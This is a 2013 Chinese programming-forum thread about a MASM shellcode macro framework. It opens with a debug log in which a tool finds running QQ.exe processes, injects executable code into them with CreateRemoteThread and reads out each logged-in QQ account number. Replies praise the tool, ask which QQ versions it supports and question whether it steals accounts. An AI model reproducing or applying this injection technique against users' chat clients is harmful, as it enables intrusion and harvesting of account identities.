00000119  10.54576683  [5112] MyIAT:Process32Next   (handle,addr info)  
00000120  10.54580212  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000121  10.54583263  [5112] MyIAT:Process32Next   (handle,addr info)  
00000122  10.54586792  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000123  10.54589844  [5112] MyIAT:Process32Next   (handle,addr info)  
00000124  10.54593468  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000125  10.54596519  [5112] MyIAT:Process32Next   (handle,addr info)  
00000126  10.54600143  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000127  10.54603195  [5112] MyIAT:Process32Next   (handle,addr info)  
00000128  10.54607105  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000129  10.54610252  [5112] MyIAT:Process32Next   (handle,addr info)  
00000130  10.54613876  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000131  10.54617119  [5112] MyIAT:OpenProcess   (4095,0,info.th32ProcessID)  
00000132  10.54664135  [5112] MyIAT:NtMapViewOfSection   (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)  
00000133  10.54668427  [5112] MyIAT:CreateRemoteThread   (hProcess1,0,0,ViewBase1,0,0,0)  
00000134  10.54684258  [5112] MyIAT:WaitForSingleObject   (hRemoteThread,INFINITE)  
00000135  10.54902363  [5216] Debug mode!  
00000136  10.54912949  [5216] injectIAT:GetModuleHandleA   ("KernelUtil.dll")  
00000137  10.54917145  [5216] injectIAT:GetProcAddress   (eax,"?GetSelfUin@Contact@Util@@YAKXZ")  
00000138  10.54944611  [5112] MyIAT:GetExitCodeThread   (hRemoteThread,addr Return_Value)  
00000139  10.54951668  [5112] MyIAT:wsprintfA   (addr @QQUid,"获取到QQ号:%d",Return_Value)  
00000140  10.54955769  [5112] MyIAT:OutputDebugStringA   (addr @QQUid)  
00000141  10.54959297  [5112] 获取到QQ号:1067968022  
00000142  10.54962349  [5112] MyIAT:CloseHandle   (hRemoteThread)  
00000143  10.54966354  [5112] MyIAT:CloseHandle   (hProcess1)  
00000144  10.54969597  [5112] MyIAT:Process32Next   (handle,addr info)  
00000145  10.54974365  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000146  10.54979992  [5112] MyIAT:OpenProcess   (4095,0,info.th32ProcessID)  
00000147  10.54984188  [5112] MyIAT:NtMapViewOfSection   (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)  
00000148  10.54989052  [5112] MyIAT:CreateRemoteThread   (hProcess1,0,0,ViewBase1,0,0,0)  
00000149  10.55005360  [5112] MyIAT:WaitForSingleObject   (hRemoteThread,INFINITE)  
00000150  10.55031776  [5988] Debug mode!  
00000151  10.55035591  [5988] injectIAT:GetModuleHandleA   ("KernelUtil.dll")  
00000152  10.55038071  [5988] injectIAT:GetProcAddress   (eax,"?GetSelfUin@Contact@Util@@YAKXZ")  
00000153  10.55056095  [5112] MyIAT:GetExitCodeThread   (hRemoteThread,addr Return_Value)  
00000154  10.55061531  [5112] MyIAT:wsprintfA   (addr @QQUid,"获取到QQ号:%d",Return_Value)  
00000155  10.55064774  [5112] MyIAT:OutputDebugStringA   (addr @QQUid)  
00000156  10.55067635  [5112] 获取到QQ号:xxxxxx隐藏
00000157  10.55070591  [5112] MyIAT:CloseHandle   (hRemoteThread)  
00000158  10.55073643  [5112] MyIAT:CloseHandle   (hProcess1)  
00000159  10.55076599  [5112] MyIAT:Process32Next   (handle,addr info)  
00000160  10.55080891  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000161  10.55084229  [5112] MyIAT:Process32Next   (handle,addr info)  
00000162  10.55088806  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000163  10.55091858  [5112] MyIAT:Process32Next   (handle,addr info)  
00000164  10.55095577  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000165  10.55098629  [5112] MyIAT:Process32Next   (handle,addr info)  
00000166  10.55102444  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000167  10.55105495  [5112] MyIAT:Process32Next   (handle,addr info)  
00000168  10.55109310  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000169  10.55112267  [5112] MyIAT:Process32Next   (handle,addr info)  
00000170  10.55116081  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000171  10.55119133  [5112] MyIAT:Process32Next   (handle,addr info)  
00000172  10.55123043  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000173  10.55125999  [5112] MyIAT:Process32Next   (handle,addr info)  
00000174  10.55129528  [5112] MyIAT:CloseHandle   (handle)  
00000175  10.55133057  [5112] MyIAT:CloseHandle   (hProcess2)  

GetQQUid.rar (7.23 KB)
搜索更多相关主题的帖子: 框架 
2013-01-07 19:17
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
收藏
得分:0 
先给个高亮再说

这个能用在什么版本的球球上面呢。。
2013-01-07 19:19
yibana
Rank: 2
等 级:论坛游民
帖 子:10
专家分:20
注 册:2013-1-6
收藏
得分:0 
以下是引用zklhp在2013-1-7 19:19:15的发言:

先给个高亮再说

这个能用在什么版本的球球上面呢。。

球球?
2013-01-07 19:21
hu9jj
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:红土地
等 级:贵宾
威 望:400
帖 子:11857
专家分:43421
注 册:2006-5-13
收藏
得分:0 
盗QQ号?

活到老,学到老!http://www.(该域名已经被ISP盗卖了)E-mail:hu-jj@
2013-01-07 19:32
信箱有效
Rank: 13Rank: 13Rank: 13Rank: 13
等 级:蒙面侠
威 望:9
帖 子:1102
专家分:4268
注 册:2012-6-19
收藏
得分:0 
http://bbs.

2013-01-07 20:11
Alar30
Rank: 10Rank: 10Rank: 10
等 级:贵宾
威 望:10
帖 子:988
专家分:1627
注 册:2009-9-8
收藏
得分:0 
这个真心帅。。
2013-01-08 13:18
信箱有效
Rank: 13Rank: 13Rank: 13Rank: 13
等 级:蒙面侠
威 望:9
帖 子:1102
专家分:4268
注 册:2012-6-19
收藏
得分:0 
6号晚上才在看雪上看到这个标题  7号在这里又看到。
是原创还是转贴?
转贴不注明是不好的呀 楼主
2013-01-08 19:06
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
收藏
得分:0 
以下是引用信箱有效在2013-1-8 19:06:24的发言:

6号晚上才在看雪上看到这个标题  7号在这里又看到。
是原创还是转贴?
转贴不注明是不好的呀 楼主
要是原创首发就加精华了 可惜啊 呵呵
2013-01-08 19:17
yibana
Rank: 2
等 级:论坛游民
帖 子:10
专家分:20
注 册:2013-1-6
收藏
得分:0 
以下是引用zklhp在2013-1-8 19:17:18的发言:

要是原创首发就加精华了 可惜啊 呵呵

看雪上没人关注就发这里了,今天打算写一份帮助文档
2013-01-08 19:28
信箱有效
Rank: 13Rank: 13Rank: 13Rank: 13
等 级:蒙面侠
威 望:9
帖 子:1102
专家分:4268
注 册:2012-6-19
收藏
得分:0 
以下是引用yibana在2013-1-8 19:28:18的发言:

 
看雪上没人关注就发这里了,今天打算写一份帮助文档
真是原创呀.大牛有时间多发点学习指导方面的帖子啊。比如汇编啊反汇编啊 逆向分析呀 c++学习啊 MFC学习啊什么什么的。
2013-01-08 20:47
快速回复:MAsM ShellCode 宏框架
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.042849 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved